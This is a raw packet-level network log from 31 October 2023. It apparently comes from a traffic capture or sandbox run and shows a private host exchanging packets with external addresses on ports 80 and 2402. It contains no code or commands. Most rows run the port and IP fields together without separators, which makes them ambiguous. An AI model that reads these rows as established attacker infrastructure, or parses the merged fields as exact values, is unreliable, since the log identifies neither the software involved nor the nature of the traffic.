Oct 31, 2023 13:19:59.637615919 CET | 80 | 50076 | 217.147.225.69 | 192.168.11.20
Oct 31, 2023 13:19:59.637631893 CET | 80 | 50076 | 217.147.225.69 | 192.168.11.20
Oct 31, 2023 13:19:59.637708902 CET | 80 | 50076 | 217.147.225.69 | 192.168.11.20
Oct 31, 2023 13:19:59.637763023 CET | 50076 | 80 | 192.168.11.20 | 217.147.225.69
Oct 31, 2023 13:19:59.637763977 CET | 50076 | 80 | 192.168.11.20 | 217.147.225.69
Oct 31, 2023 13:19:59.637855053 CET | 80 | 50076 | 217.147.225.69 | 192.168.11.20
Oct 31, 2023 13:19:59.637888908 CET | 50076 | 80 | 192.168.11.20 | 217.147.225.69
Oct 31, 2023 13:19:59.638031006 CET | 50076 | 80 | 192.168.11.20 | 217.147.225.69
Oct 31, 2023 13:19:59.638041019 CET | 80 | 50076 | 217.147.225.69 | 192.168.11.20
Oct 31, 2023 13:19:59.638061047 CET | 80 | 50076 | 217.147.225.69 | 192.168.11.20
Oct 31, 2023 13:19:59.638185978 CET | 50076 | 80 | 192.168.11.20 | 217.147.225.69
Oct 31, 2023 13:19:59.638185978 CET | 50076 | 80 | 192.168.11.20 | 217.147.225.69
Oct 31, 2023 13:19:59.638262987 CET | 80 | 50076 | 217.147.225.69 | 192.168.11.20
Oct 31, 2023 13:19:59.638400078 CET | 80 | 50076 | 217.147.225.69 | 192.168.11.20
Oct 31, 2023 13:19:59.638408899 CET | 50076 | 80 | 192.168.11.20 | 217.147.225.69
Oct 31, 2023 13:19:59.638420105 CET | 80 | 50076 | 217.147.225.69 | 192.168.11.20
Oct 31, 2023 13:19:59.638525009 CET | 50076 | 80 | 192.168.11.20 | 217.147.225.69
Oct 31, 2023 13:19:59.638525009 CET | 50076 | 80 | 192.168.11.20 | 217.147.225.69
Oct 31, 2023 13:20:00.410552025 CET | 50077 | 2402 | 192.168.11.20 | 94.156.6.253
Oct 31, 2023 13:20:00.648978949 CET | 2402 | 50077 | 94.156.6.253 | 192.168.11.20
Oct 31, 2023 13:20:00.649898052 CET | 50077 | 2402 | 192.168.11.20 | 94.156.6.253
Oct 31, 2023 13:20:00.651243925 CET | 50077 | 2402 | 192.168.11.20 | 94.156.6.253
                                                                                                                                                                                                                    Oct 31, 2023 13:20:00.905077934 CET24025007794.156.6.253192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:20:00.908058882 CET500772402192.168.11.2094.156.6.253
                                                                                                                                                                                                                    Oct 31, 2023 13:20:01.146765947 CET24025007794.156.6.253192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:20:01.153382063 CET500782402192.168.11.2094.156.6.253
                                                                                                                                                                                                                    Oct 31, 2023 13:20:01.192812920 CET500772402192.168.11.2094.156.6.253
                                                                                                                                                                                                                    Oct 31, 2023 13:20:01.310750008 CET5007980192.168.11.20178.237.33.50
                                                                                                                                                                                                                    Oct 31, 2023 13:20:01.393667936 CET24025007894.156.6.253192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:20:01.393929958 CET500782402192.168.11.2094.156.6.253
                                                                                                                                                                                                                    Oct 31, 2023 13:20:01.394501925 CET500782402192.168.11.2094.156.6.253
                                                                                                                                                                                                                    Oct 31, 2023 13:20:01.558844090 CET8050079178.237.33.50192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:20:01.559281111 CET5007980192.168.11.20178.237.33.50
                                                                                                                                                                                                                    Oct 31, 2023 13:20:01.559552908 CET5007980192.168.11.20178.237.33.50
                                                                                                                                                                                                                    Oct 31, 2023 13:20:01.637311935 CET24025007894.156.6.253192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:20:01.637386084 CET24025007894.156.6.253192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:20:01.637445927 CET24025007894.156.6.253192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:20:01.637500048 CET24025007894.156.6.253192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:20:01.637799978 CET500782402192.168.11.2094.156.6.253
                                                                                                                                                                                                                    Oct 31, 2023 13:20:01.818048000 CET8050079178.237.33.50192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:20:01.818766117 CET5007980192.168.11.20178.237.33.50
                                                                                                                                                                                                                    Oct 31, 2023 13:20:01.862622976 CET500772402192.168.11.2094.156.6.253
                                                                                                                                                                                                                    Oct 31, 2023 13:20:01.878012896 CET24025007894.156.6.253192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:20:01.878051996 CET24025007894.156.6.253192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:20:01.878072023 CET24025007894.156.6.253192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:20:01.878232002 CET24025007894.156.6.253192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:20:01.878350973 CET24025007894.156.6.253192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:20:01.878354073 CET500782402192.168.11.2094.156.6.253
                                                                                                                                                                                                                    Oct 31, 2023 13:20:01.878374100 CET24025007894.156.6.253192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:20:01.878391981 CET24025007894.156.6.253192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:20:01.878407955 CET24025007894.156.6.253192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:20:01.878454924 CET500782402192.168.11.2094.156.6.253
                                                                                                                                                                                                                    Oct 31, 2023 13:20:01.878604889 CET500782402192.168.11.2094.156.6.253
                                                                                                                                                                                                                    Oct 31, 2023 13:20:02.118807077 CET24025007894.156.6.253192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:20:02.118887901 CET24025007894.156.6.253192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:20:02.118944883 CET24025007894.156.6.253192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:20:02.119004011 CET24025007894.156.6.253192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:20:02.119057894 CET24025007894.156.6.253192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:20:02.119060040 CET500782402192.168.11.2094.156.6.253
                                                                                                                                                                                                                    Oct 31, 2023 13:20:02.119112015 CET24025007894.156.6.253192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:20:02.119168043 CET24025007894.156.6.253192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:20:02.119220972 CET24025007894.156.6.253192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:20:02.119273901 CET24025007894.156.6.253192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:20:02.119328022 CET24025007894.156.6.253192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:20:02.119380951 CET24025007894.156.6.253192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:20:02.119379997 CET500782402192.168.11.2094.156.6.253
                                                                                                                                                                                                                    Oct 31, 2023 13:20:02.119436979 CET24025007894.156.6.253192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:20:02.119492054 CET24025007894.156.6.253192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:20:02.119545937 CET24025007894.156.6.253192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:20:02.119597912 CET24025007894.156.6.253192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:20:02.119652987 CET24025007894.156.6.253192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:20:02.119734049 CET500782402192.168.11.2094.156.6.253
                                                                                                                                                                                                                    Oct 31, 2023 13:20:02.119828939 CET500782402192.168.11.2094.156.6.253
                                                                                                                                                                                                                    Oct 31, 2023 13:20:02.168623924 CET24025007794.156.6.253192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:20:02.360152960 CET24025007894.156.6.253192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:20:02.360245943 CET24025007894.156.6.253192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:20:02.360305071 CET24025007894.156.6.253192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:20:02.360359907 CET24025007894.156.6.253192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:20:02.360414982 CET24025007894.156.6.253192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:20:02.360429049 CET500782402192.168.11.2094.156.6.253
                                                                                                                                                                                                                    Oct 31, 2023 13:20:02.360470057 CET24025007894.156.6.253192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:20:02.360526085 CET24025007894.156.6.253192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:20:02.360579967 CET24025007894.156.6.253192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:20:02.360627890 CET500782402192.168.11.2094.156.6.253
                                                                                                                                                                                                                    Oct 31, 2023 13:20:02.360634089 CET24025007894.156.6.253192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:20:02.360627890 CET500782402192.168.11.2094.156.6.253
                                                                                                                                                                                                                    Oct 31, 2023 13:20:02.360691071 CET24025007894.156.6.253192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:20:02.360744953 CET24025007894.156.6.253192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:20:02.360791922 CET500782402192.168.11.2094.156.6.253
                                                                                                                                                                                                                    Oct 31, 2023 13:20:02.360842943 CET500782402192.168.11.2094.156.6.253
                                                                                                                                                                                                                    Oct 31, 2023 13:20:02.360907078 CET24025007894.156.6.253192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:20:02.360965014 CET24025007894.156.6.253192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:20:02.361017942 CET24025007894.156.6.253192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:20:02.361124039 CET24025007894.156.6.253192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:20:02.361134052 CET500782402192.168.11.2094.156.6.253
                                                                                                                                                                                                                    Oct 31, 2023 13:20:02.361180067 CET24025007894.156.6.253192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:20:02.361181021 CET500782402192.168.11.2094.156.6.253
                                                                                                                                                                                                                    Oct 31, 2023 13:20:02.361233950 CET24025007894.156.6.253192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:20:02.361341953 CET500782402192.168.11.2094.156.6.253
                                                                                                                                                                                                                    Oct 31, 2023 13:20:02.361376047 CET24025007894.156.6.253192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:20:02.361433029 CET24025007894.156.6.253192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:20:02.361625910 CET500782402192.168.11.2094.156.6.253
                                                                                                                                                                                                                    Oct 31, 2023 13:20:02.361685038 CET24025007894.156.6.253192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:20:02.361743927 CET24025007894.156.6.253192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:20:02.361798048 CET24025007894.156.6.253192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:20:02.361848116 CET500782402192.168.11.2094.156.6.253
                                                                                                                                                                                                                    Oct 31, 2023 13:20:02.361851931 CET24025007894.156.6.253192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:20:02.361907005 CET24025007894.156.6.253192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:20:02.361959934 CET24025007894.156.6.253192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:20:02.362015009 CET24025007894.156.6.253192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:20:02.362037897 CET500782402192.168.11.2094.156.6.253
                                                                                                                                                                                                                    Oct 31, 2023 13:20:02.362133026 CET24025007894.156.6.253192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:20:02.362189054 CET24025007894.156.6.253192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:20:02.362212896 CET500782402192.168.11.2094.156.6.253
                                                                                                                                                                                                                    Oct 31, 2023 13:20:02.362405062 CET500782402192.168.11.2094.156.6.253
                                                                                                                                                                                                                    Oct 31, 2023 13:20:02.602336884 CET24025007894.156.6.253192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:20:02.602416039 CET24025007894.156.6.253192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:20:02.602473021 CET24025007894.156.6.253192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:20:02.602535963 CET24025007894.156.6.253192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:20:02.602638006 CET24025007894.156.6.253192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:20:02.845196009 CET500782402192.168.11.2094.156.6.253
                                                                                                                                                                                                                    Oct 31, 2023 13:20:02.845199108 CET24025007894.156.6.253192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:20:02.845216990 CET24025007894.156.6.253192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:20:02.845233917 CET24025007894.156.6.253192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:20:02.845244884 CET500782402192.168.11.2094.156.6.253
                                                                                                                                                                                                                    Oct 31, 2023 13:20:02.845252037 CET24025007894.156.6.253192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:20:02.845268965 CET24025007894.156.6.253192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:20:02.845287085 CET24025007894.156.6.253192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:20:02.845304012 CET24025007894.156.6.253192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:20:02.845313072 CET500782402192.168.11.2094.156.6.253
                                                                                                                                                                                                                    Oct 31, 2023 13:20:02.845320940 CET24025007894.156.6.253192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:20:02.845339060 CET24025007894.156.6.253192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:20:02.845355988 CET24025007894.156.6.253192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:20:02.845372915 CET24025007894.156.6.253192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:20:02.845390081 CET24025007894.156.6.253192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:20:02.845407009 CET24025007894.156.6.253192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:20:02.845424891 CET24025007894.156.6.253192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:20:02.845442057 CET24025007894.156.6.253192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:20:02.845457077 CET500782402192.168.11.2094.156.6.253
                                                                                                                                                                                                                    Oct 31, 2023 13:20:02.845458984 CET24025007894.156.6.253192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:20:02.845572948 CET500782402192.168.11.2094.156.6.253
                                                                                                                                                                                                                    Oct 31, 2023 13:20:02.845577002 CET24025007894.156.6.253192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:20:02.845594883 CET24025007894.156.6.253192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:20:02.845613003 CET24025007894.156.6.253192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:20:02.845645905 CET24025007894.156.6.253192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:20:02.845777035 CET24025007894.156.6.253192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:20:02.845794916 CET500782402192.168.11.2094.156.6.253
                                                                                                                                                                                                                    Oct 31, 2023 13:20:02.845843077 CET24025007894.156.6.253192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:20:02.845859051 CET500782402192.168.11.2094.156.6.253
                                                                                                                                                                                                                    Oct 31, 2023 13:20:02.845860958 CET24025007894.156.6.253192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:20:02.845877886 CET24025007894.156.6.253192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:20:02.845896006 CET24025007894.156.6.253192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:20:02.845912933 CET24025007894.156.6.253192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:20:02.845930099 CET24025007894.156.6.253192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:20:02.845947027 CET24025007894.156.6.253192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:20:02.845963955 CET24025007894.156.6.253192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:20:02.845980883 CET24025007894.156.6.253192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:20:02.845999002 CET24025007894.156.6.253192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:20:02.846003056 CET500782402192.168.11.2094.156.6.253
                                                                                                                                                                                                                    Oct 31, 2023 13:20:02.846015930 CET24025007894.156.6.253192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:20:02.846146107 CET500782402192.168.11.2094.156.6.253
                                                                                                                                                                                                                    Oct 31, 2023 13:20:02.846191883 CET24025007894.156.6.253192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:20:02.846209049 CET24025007894.156.6.253192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:20:02.846226931 CET24025007894.156.6.253192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:20:02.846244097 CET24025007894.156.6.253192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:20:02.846261024 CET24025007894.156.6.253192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:20:02.846277952 CET24025007894.156.6.253192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:20:02.846295118 CET24025007894.156.6.253192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:20:02.846313000 CET24025007894.156.6.253192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:20:02.846328020 CET500782402192.168.11.2094.156.6.253
                                                                                                                                                                                                                    Oct 31, 2023 13:20:02.846421957 CET24025007894.156.6.253192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:20:02.846470118 CET24025007894.156.6.253192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:20:02.846488953 CET24025007894.156.6.253192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:20:02.846506119 CET24025007894.156.6.253192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:20:02.846522093 CET500782402192.168.11.2094.156.6.253
                                                                                                                                                                                                                    Oct 31, 2023 13:20:02.846524000 CET24025007894.156.6.253192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:20:02.846541882 CET24025007894.156.6.253192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:20:02.846559048 CET24025007894.156.6.253192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:20:02.846575975 CET24025007894.156.6.253192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:20:02.846592903 CET24025007894.156.6.253192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:20:02.846611023 CET24025007894.156.6.253192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:20:02.846627951 CET24025007894.156.6.253192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:20:02.846646070 CET24025007894.156.6.253192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:20:02.846662998 CET24025007894.156.6.253192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:20:02.846695900 CET24025007894.156.6.253192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:20:02.846714020 CET24025007894.156.6.253192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:20:02.846731901 CET24025007894.156.6.253192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:20:02.846750975 CET24025007894.156.6.253192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:20:02.846781969 CET500782402192.168.11.2094.156.6.253
                                                                                                                                                                                                                    Oct 31, 2023 13:20:02.846831083 CET500782402192.168.11.2094.156.6.253
                                                                                                                                                                                                                    Oct 31, 2023 13:20:02.846863031 CET24025007894.156.6.253192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:20:02.846910954 CET24025007894.156.6.253192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:20:02.846945047 CET24025007894.156.6.253192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:20:02.846965075 CET500782402192.168.11.2094.156.6.253
                                                                                                                                                                                                                    Oct 31, 2023 13:20:02.847079992 CET24025007894.156.6.253192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:20:02.847101927 CET24025007894.156.6.253192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:20:02.847121954 CET500782402192.168.11.2094.156.6.253
                                                                                                                                                                                                                    Oct 31, 2023 13:20:02.847237110 CET500782402192.168.11.2094.156.6.253
                                                                                                                                                                                                                    Oct 31, 2023 13:20:02.847582102 CET24025007894.156.6.253192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:20:02.847604036 CET24025007894.156.6.253192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:20:02.847716093 CET24025007894.156.6.253192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:20:02.847738028 CET24025007894.156.6.253192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:20:02.847755909 CET24025007894.156.6.253192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:20:02.847770929 CET500782402192.168.11.2094.156.6.253
                                                                                                                                                                                                                    Oct 31, 2023 13:20:02.847773075 CET24025007894.156.6.253192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:20:02.847831964 CET24025007894.156.6.253192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:20:02.847850084 CET24025007894.156.6.253192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:20:02.847867966 CET24025007894.156.6.253192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:20:02.847875118 CET500782402192.168.11.2094.156.6.253
                                                                                                                                                                                                                    Oct 31, 2023 13:20:02.847875118 CET500782402192.168.11.2094.156.6.253
                                                                                                                                                                                                                    Oct 31, 2023 13:20:02.847884893 CET24025007894.156.6.253192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:20:02.848053932 CET24025007894.156.6.253192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:20:02.848073959 CET24025007894.156.6.253192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:20:02.848123074 CET500782402192.168.11.2094.156.6.253
                                                                                                                                                                                                                    Oct 31, 2023 13:20:02.848290920 CET500782402192.168.11.2094.156.6.253
                                                                                                                                                                                                                    Oct 31, 2023 13:20:03.083933115 CET24025007894.156.6.253192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:20:03.084069014 CET24025007894.156.6.253192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:20:03.084202051 CET24025007894.156.6.253192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:20:03.088547945 CET24025007894.156.6.253192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:20:03.088566065 CET24025007894.156.6.253192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:20:03.088583946 CET24025007894.156.6.253192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:20:03.088602066 CET24025007894.156.6.253192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:20:03.088618994 CET24025007894.156.6.253192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:20:03.088637114 CET24025007894.156.6.253192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:20:03.088654995 CET24025007894.156.6.253192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:20:03.088673115 CET24025007894.156.6.253192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:20:03.088690996 CET24025007894.156.6.253192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:20:03.088707924 CET24025007894.156.6.253192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:20:03.088726044 CET24025007894.156.6.253192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:20:03.088745117 CET24025007894.156.6.253192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:20:03.088762045 CET24025007894.156.6.253192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:20:03.088779926 CET24025007894.156.6.253192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:20:03.088782072 CET500782402192.168.11.2094.156.6.253
                                                                                                                                                                                                                    Oct 31, 2023 13:20:03.088798046 CET24025007894.156.6.253192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:20:03.088815928 CET24025007894.156.6.253192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:20:03.088833094 CET24025007894.156.6.253192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:20:03.088850975 CET24025007894.156.6.253192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:20:03.088860989 CET500782402192.168.11.2094.156.6.253
                                                                                                                                                                                                                    Oct 31, 2023 13:20:03.088869095 CET24025007894.156.6.253192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:20:03.088886976 CET24025007894.156.6.253192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:20:03.088903904 CET24025007894.156.6.253192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:20:03.088922977 CET24025007894.156.6.253192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:20:03.088939905 CET24025007894.156.6.253192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:20:03.088958979 CET24025007894.156.6.253192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:20:03.088977098 CET24025007894.156.6.253192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:20:03.088994980 CET24025007894.156.6.253192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:20:03.089011908 CET24025007894.156.6.253192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:20:03.089014053 CET500782402192.168.11.2094.156.6.253
                                                                                                                                                                                                                    Oct 31, 2023 13:20:03.089030027 CET24025007894.156.6.253192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:20:03.089047909 CET24025007894.156.6.253192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:20:03.089066029 CET24025007894.156.6.253192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:20:03.089082956 CET24025007894.156.6.253192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:20:03.089101076 CET24025007894.156.6.253192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:20:03.089118004 CET24025007894.156.6.253192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:20:03.089135885 CET24025007894.156.6.253192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:20:03.089143991 CET500782402192.168.11.2094.156.6.253
                                                                                                                                                                                                                    Oct 31, 2023 13:20:03.089154005 CET24025007894.156.6.253192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:20:03.089171886 CET24025007894.156.6.253192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:20:03.089190006 CET24025007894.156.6.253192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:20:03.089207888 CET24025007894.156.6.253192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:20:03.089225054 CET24025007894.156.6.253192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:20:03.089242935 CET24025007894.156.6.253192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:20:03.089258909 CET500782402192.168.11.2094.156.6.253
                                                                                                                                                                                                                    Oct 31, 2023 13:20:03.089261055 CET24025007894.156.6.253192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:20:03.089278936 CET24025007894.156.6.253192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:20:03.089298010 CET24025007894.156.6.253192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:20:03.089315891 CET24025007894.156.6.253192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:20:03.089333057 CET24025007894.156.6.253192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:20:03.089350939 CET24025007894.156.6.253192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:20:03.089369059 CET24025007894.156.6.253192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:20:03.089386940 CET24025007894.156.6.253192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:20:03.089404106 CET24025007894.156.6.253192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:20:03.089421988 CET24025007894.156.6.253192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:20:03.089438915 CET24025007894.156.6.253192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:20:03.089454889 CET24025007894.156.6.253192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:20:03.089493036 CET500782402192.168.11.2094.156.6.253
                                                                                                                                                                                                                    Oct 31, 2023 13:20:03.089610100 CET500782402192.168.11.2094.156.6.253
                                                                                                                                                                                                                    Oct 31, 2023 13:20:03.579982042 CET24025007794.156.6.253192.168.11.20
